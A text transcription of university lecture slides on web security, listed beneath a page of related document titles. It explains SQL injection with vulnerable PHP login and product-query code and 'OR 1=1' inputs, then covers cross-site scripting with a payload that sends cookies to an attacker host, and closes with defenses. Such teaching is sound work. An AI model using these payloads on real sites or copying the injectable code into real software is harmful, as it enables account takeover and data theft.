IS 2150 / TEL 2810 Introduction to Security

Similar documents
SQL Injection Cross-Site Scripting

Attacks Against Websites. Tom Chothia Computer Security, Lecture 11

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

John Coggeshall Copyright 2006, Zend Technologies Inc.

NET 311 INFORMATION SECURITY

CIS 4360 Secure Computer Systems XSS

CS 161 Computer Security

P2_L12 Web Security Page 1

Web Security. Jace Baker, Nick Ramos, Hugo Espiritu, Andrew Le

Solution of Exercise Sheet 5

CS 155 Project 2. Overview & Part A

CSCE 813 Internet Security Case Study II: XSS

CS 161 Computer Security

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Finding Vulnerabilities in Web Applications

Security issues. Unit 27 Web Server Scripting Extended Diploma in ICT 2016 Lecture: Phil Smith

Application vulnerabilities and defences

Web Application Security. Philippe Bogaerts

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

Web Security IV: Cross-Site Attacks

Web Security: Vulnerabilities & Attacks

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Client Side Injection on Web Applications

CS 161 Computer Security

Lecture Overview. IN5290 Ethical Hacking

Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks

Daniel Pittman October 17, 2011

PHP: Cookies, Sessions, Databases. CS174. Chris Pollett. Sep 24, 2008.

Web Application Security

Security. CSC309 TA: Sukwon Oh

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

CNIT 129S: Securing Web Applications. Ch 12: Attacking Users: Cross-Site Scripting (XSS) Part 2

Perslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

Advanced Web Technology 10) XSS, CSRF and SQL Injection

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

XSS Homework. 1 Overview. 2 Lab Environment

Web Application Threats and Remediation. Terry Labach, IST Security Team

Andrew Muller, Canberra Managing Director, Ionize, Canberra The challenges of Security Testing. Security Testing. Taming the Wild West

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Understanding Basic SQL Injection

CNIT 129S: Securing Web Applications. Ch 10: Attacking Back-End Components

CS 161 Computer Security

COMP9321 Web Application Engineering

Is Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection

Chrome Extension Security Architecture

Web Security. Attacks on Servers 11/6/2017 1

Web Applilicati tion S i ecur t ity SIRT Se u c i r ty ity T a r i aining April 9th, 2009

Reflected XSS Cross-Site Request Forgery Other Attacks

Web Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin

WEB SECURITY: XSS & CSRF

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

CS 142 Winter Session Management. Dan Boneh

Web Security. Web Programming.

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

Web Security: Vulnerabilities & Attacks

Application Security through a Hacker s Eyes James Walden Northern Kentucky University

eb Security Software Studio

Lecture 17 Browser Security. Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Some slides from Bailey's ECE 422

2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Security Course. WebGoat Lab sessions

Integrity attacks (from data to code): Cross-site Scripting - XSS

Web Security II. Slides from M. Hicks, University of Maryland

Network Security - ISA 656 Web Security

The security of Mozilla Firefox s Extensions. Kristjan Krips

Secure Coding and Code Review. Berlin : 2012

Hello everyone! Page 1. Your folder should look like this. To start with Run your XAMPP app and start your Apache and MySQL.

Slides adopted from Laurie Williams. OWASP Top Ten. John Slankas

CSCE 548 Building Secure Software SQL Injection Attack

PHP Development - Introduction

Security for the Web. Thanks to Dave Levin for some slides

Web basics: HTTP cookies

Abusing Windows Opener to Bypass CSRF Protection (Never Relay On Client Side)

MWR InfoSecurity Advisory. 26 th April Elastic Path Administrative. Quit. Session Hijacking through Embedded XSS

OWASP Top 10 Risks. Many thanks to Dave Wichers & OWASP

Injection. CSC 482/582: Computer Security Slide #1

Common Websites Security Issues. Ziv Perry

2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.

Web Security, Part 2

Static analysis of PHP applications

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

How is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach

Security for the Web. Thanks to Dave Levin for some slides

CSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis

Web Attacks Lab. 35 Points Group Lab Due Date: Lesson 16

Exploiting and Defending: Common Web Application Vulnerabilities

CSCD 303 Essential Computer Security Fall 2017

Information Security CS 526 Topic 11

Web Attacks CMSC 414. September 25 & 27, 2017

CIS 3308 Logon Homework

WELCOME. APEX Security Primer. About Enkitec. About the Presenter. ! Oracle Platinum Partner! Established in 2004

EasyCrypt passes an independent security audit

COMS 469: Interactive Media II

Webapps Vulnerability Report

Web Application Security. Srikumar Venugopal Week 8, S2, 2014

MWR InfoSecurity Security Advisory. DotNetNuke Cross Site Request Forgery Vulnerability Contents

Transcription:

IS 2150 / TEL 2810 Introduction to Security James Joshi Professor, SIS Lecture 15 April 20, 2016 SQL Injection Cross-Site Scripting 1

Goals Overview SQL Injection Attacks Cross-Site Scripting Attacks Some defenses 2

Web Applications Three-tier applications Make queries and updates against the database Scalability issue 3

Web Applications N-tier Architecture 4

SQL Injection how it happens In Web application values received from a Web form, cookie, input parameter, etc., are not typically validated before passing them to SQL queries to a database server. Dynamically built SQL statements an attacker can control the input that is sent to an SQL query and manipulate that t input the attacker may be able to execute the code on the back-end database. 5

HTTP Methods: Get and Post POST Sends information pieces to the Web Server Fill the web form & submit <form action="process.php" method="post"> <select name="item">... <input name="quantity" type="text" /> $quantity = $_POST['quantity']; $item = $_POST['item']; 6

HTTP Methods: Get and Post GET method Requests the server whatever is in the URL <form action="process.php" method= get"> <select name="item">... <input name="quantity" type="text" text /> $quantity = $_GET['quantity']; $item = $ _ GET['item']; At the end of the URL: "?item=##&quantity=##" 7

SQL Injection http://www.victim.com/products.php?val=100 com/products php?val=100 To view products less than $100 val is used to pass the value you want to check for PHP Scripts create a SQL statement t t based on this // connect to the database $conn = mysql_connect( localhost, username, password ); // dynamically build the sql statement with the input $query = SELECT * FROM Products WHERE Price < $_GET[ val ]. ORDER BY ProductDescription ; // execute the query against the database $result = mysql_query($query); query($query); // iterate through the record set // CODE to Display the result SELECT * FROM Products WHERE Price < 100.00 ORDER BY ProductDescription; 8

SQL Injection http://www.victim.com/products.php?val=100 com/products php?val=100 OR 1 = 1 1=1 SELECT * FROM Products WHERE Price < 100.00 OR 1 = 1 ORDER BY ProductDescription; The WHERE condition is always true So returns all the product! 9

SQL Injection CMS Application (Content Mgmt System) http://www.victim.com/cms/login.php?username=foo&password=bar // connect to the database $conn = mysql_connect( localhost, username, password ); // dynamically build the sql statement with the input $query = SELECT userid FROM CMSUsers WHERE user = $_GET[ user ]. AND password = $_GET[ password ] ; // execute the query against the database $result = mysql_query($query); SELECT userid FROM CMSUsers $rowcount = mysql_num_rows($result); WHERE user = foo AND password = bar ; // if a row is returned then the credentials must be valid, so // forward the user to the admin pages if ($rowcount! = 0){header( Location: admin.php );} // if a row is not returned then the credentials must be invalid else {die( Incorrect username or password, please try again. )} 10

SQL Injection CMS Application (content Mgmt System) http://www.victim.com/cms/login.php?username=foo&password=bar Remaining i code $rowcount = mysql_num_rows($result); // if a row is returned then the credentials must be valid, so // forward the user to the admin pages if ($rowcount! = 0){header( Location: admin.php );} // if a row is not returned then the credentials must be invalid else {die( Incorrect username or password, please try again. )} http://www.victim.com/cms/login.php?username=foo&password=bar OR 1 = 1 1 SELECT userid FROM CMSUsers WHERE user = foo AND password = bar OR 1 = 1 ; 11

Defenses Parameterization ti PL/SQL DECLARE username varchar2(32); password varchar2(32); result integer; BEGIN Execute immediate SELECT count(*) FROM users where username=:1 and password=:2 into result using username, password; END; 12

Defenses Validating Input Validate compliance to defined types Whitelisting: Accept those known to be good Blacklisting: Identify bad inputs Data type/size/range/content Regular expression ^d{5}(-\d{4})?$ [for zipcode] Try to filter blacklisted characters (can be evaded) 13

Sources for other defenses Other approaches available OWA Security Project (www.owasp.org) 14

Cross-Site Scripting 15

Cross Site Scripting XSS : Cross-Site Scripting Quite common vulnerability in Web applications Allows attackers to insert Malicious Code To bypass access To launch phishing attacks Cross-Site -foreign script sent via server to client Malicious script is executed in Client s Web Browser

Cross Site Scripting Scripting: Web Browsers can execute commands Embedded in HTML page Supports different e languages (JavaScript, asc VBScript, ActiveX, etc.) Attack may involve Stealing Access Credentials, Denial-of-Service, Modifying Web pages, etc. Executing some command at the client machine

Overview of the Attack <HTML> <Title>Welcome!</Title> Hi Mark Anthony<BR> Welcome To Our Page... </HTML> Client page Target Server Name = Mark Anthony GET /welcomepage.cgi?name=mark%20anthony HTTP/1.0 Host: www.targetserver.com

Overview of the Attack <HTML> <Title>Welcome!</Title> Hi <script>alert(document.cookie)</script> <BR> Welcome To Our Page... </HTML> - Opens a browser window - All cookie related to TargetServer displayed Client When clicked Target Server Page with link Attacker GET /welcomepage.cgi?name=<script>alert(document.cookie)</script> HTTP/1.0 Host: www.targetserver.com Page has link: http://www.targetserver.com/welcome.cgi?name=<script>alert (document.cookie)</script>

Overview of the Attack In a real attack attacker wants all the cookie!! Page has link: http://www.targetserver.com/welcomepage.cgi?name=<script>window.open( ht tp://www.attacker.site/collect.cgi?cookie= %2Bdocument.cookie)</script> <HTML> <Title>Welcome!</Title> Hi <script>window.open( http://www.attacker.site/collect.cgi?cookie= +document document.cookie)</script> <BR> Welcome To Our Page - Calls collect.cgi at attacker.site... - All cookie related to TargetServer are sent as input to </HTML> the cookie variable - Cookies compromised!! - Attacker can impersonate the victim at the TargetServer!!

Defenses Properly sanitize input E.g., filter out < and > Fireforx Nscript Plugin does it But client is not responsible developers need to be careful Built-in browser security Selectively disable client-side scripting Safe browsing practice 21

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback